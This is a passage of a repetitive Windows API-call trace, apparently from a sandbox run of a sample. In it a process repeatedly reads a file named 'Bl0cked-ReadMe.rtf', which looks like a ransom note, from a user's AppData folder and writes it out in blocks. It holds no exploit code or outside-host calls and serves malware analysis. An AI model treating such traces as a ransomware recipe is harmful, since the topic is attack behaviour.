(_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0136.468] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0136.468] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0136.468] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee1f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0136.468] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0136.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.468] GetFileType (hFile=0x54) returned 0x1 [0136.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.468] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee248 | out: lpFileSizeHigh=0x2ee248*=0x0) returned 0x1632 [0136.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.468] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.469] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.469] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.469] GetFileType (hFile=0x4c) returned 0x1 [0136.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.469] GetFileType (hFile=0x4c) returned 0x1 [0136.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.469] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.471] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.471] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.472] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.472] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.473] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.473] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.474] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.474] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.475] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.475] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.476] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.476] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.477] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 